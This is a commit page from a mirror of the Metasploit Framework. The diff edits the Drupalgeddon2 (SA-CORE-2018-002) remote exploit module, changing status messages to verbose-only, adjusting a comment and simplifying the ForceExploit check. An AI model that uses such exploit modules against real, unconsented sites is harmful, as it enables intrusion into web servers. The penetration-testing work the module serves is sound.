infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update drupal_drupalgeddon2

master
William Vu 2019-03-05 12:59:44 -06:00
parent 92a9c7184b
commit d30bfe2cbf
1 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
View File

@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
]
],
'DefaultTarget' => 0, # Automatic (PHP In-Memory)
'DefaultOptions' => {'WfsDelay' => 2}, # Wait between and after attempts
'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts
'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
))
@ -143,22 +143,22 @@ class MetasploitModule < Msf::Exploit::Remote
@version = target['Version'] || drupal_version
if @version
print_status("Drupal #{@version} targeted at #{full_uri}")
vprint_status("Drupal #{@version} targeted at #{full_uri}")
checkcode = CheckCode::Detected
else
print_error('Could not determine Drupal version to target')
vprint_error('Could not determine Drupal version to target')
return CheckCode::Unknown
end
changelog = drupal_changelog(@version)
if changelog && changelog.include?('SA-CORE-2018-002')
print_warning('Drupal appears patched in CHANGELOG.txt')
vprint_warning('Drupal appears patched in CHANGELOG.txt')
elsif changelog
print_good('Drupal appears unpatched in CHANGELOG.txt')
vprint_good('Drupal appears unpatched in CHANGELOG.txt')
checkcode = CheckCode::Appears
else
print_error('Could not determine Drupal patch level')
vprint_error('Could not determine Drupal patch level')
end
token = rand_str
@ -172,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
if check == CheckCode::Safe && datastore['ForceExploit'] == false
if check == CheckCode::Safe && !datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end